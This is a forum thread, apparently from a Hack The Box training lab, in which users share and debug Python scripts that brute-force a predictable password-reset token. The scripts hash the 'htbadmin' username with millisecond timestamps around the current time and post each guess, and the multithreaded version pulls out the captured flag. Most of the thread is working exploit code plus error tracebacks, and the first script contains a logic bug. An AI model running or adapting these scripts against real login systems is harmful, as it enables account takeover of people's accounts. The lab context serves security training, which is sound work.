Broken Authentication - Predictable Reset Token - Question 1

jydn879 · November 29, 2022, 7:31pm

this is the script i have come up with but does not seem to be working can someone tell me what I am doing wrong?

from hashlib import md5
import requests
import time
import datetime

url = "http://<IP Adddress>/question1/"
time = int(time.time())
now = int(time) * 1000 
start_time = now - 1500
fail_text = "Wrong token"
user = "htbadmin"
endtime = now + 1500

pre_data = {"submit": "htbuser"}
pre_res = requests.post(url, data = pre_data)
if "Your token is" in pre_res.text:
	for x in range(start_time, endtime):
		token = user + str(x)
		md5_token = md5(token.encode()).hexdigest()
		raw_data = {
		"token": {md5_token}, 
		"submit": "check"
		}
		print("checking {} {} {}".format(str(x), md5_token, token))

		res = requests.post(url, data=raw_data)

if not fail_text in res.text:
    print(res.text)
    print("[*] Congratulations!")
    exit()

Naivenom · December 5, 2022, 9:57am

Hello I think your script is correct, I have same issue because Apache OpenMeeting bug takes (username+timestamp) and md5. Anyone who solves this challenge could help?

luckyfof · January 5, 2023, 8:55am

Hello jydn879,

I modify your script and it’s work now.

Thank you for your code

import threading
import requests
from hashlib import md5
import re
import time

url = "http://178.128.37.153:30884/question1/"
time = int(time.time()) * 1000
start_time = time
fail_text = "Wrong token"
user = "htbadmin"


def check_token(x):
    token = user + str(x)
    md5_token = md5(token.encode()).hexdigest()
    raw_data = {
        "token": {md5_token},
        "submit": "check"
    }
    res = requests.post(url, data=raw_data)
    if fail_text in res.text:
        pass
    else:
        htb_string_regex = r"HTB\{[^}]*\}"
        htb_strings = re.findall(htb_string_regex, res.text)
        if htb_strings:
            print(htb_strings[0])
        print("[*] Congratulations!")
        exit()


pre_data = {"submit": "htbuser"}
pre_res = requests.post(url, data=pre_data)
if "Your token is" in pre_res.text:
    threads = []
    for x in range(start_time - 2250, start_time + 2250):
        t = threading.Thread(target=check_token, args=(x,))
        threads.append(t)
        t.start()
    for t in threads:
        t.join()

muskypirate · April 27, 2023, 6:34am

I tried to use your script, but for some reason I am unable to get it to run properly … it goes in an endless loop where all I get is:

Traceback (most recent call last):
File “/usr/lib/python3/dist-packages/urllib3/connection.py”, line 174, in _new_conn
File “/usr/lib/python3/dist-packages/urllib3/util/connection.py”, line 96, in create_connection
Exception in thread Thread-1034 (check_token):
Traceback (most recent call last):
File “/usr/lib/python3/dist-packages/urllib3/connection.py”, line 174, in _new_conn
File “/usr/lib/python3/dist-packages/urllib3/util/connection.py”, line 96, in create_connection
Exception in thread Thread-1035 (check_token):
File “/usr/lib/python3/dist-packages/urllib3/util/connection.py”, line 77, in create_connection
Exception in thread Thread-1036 (check_token):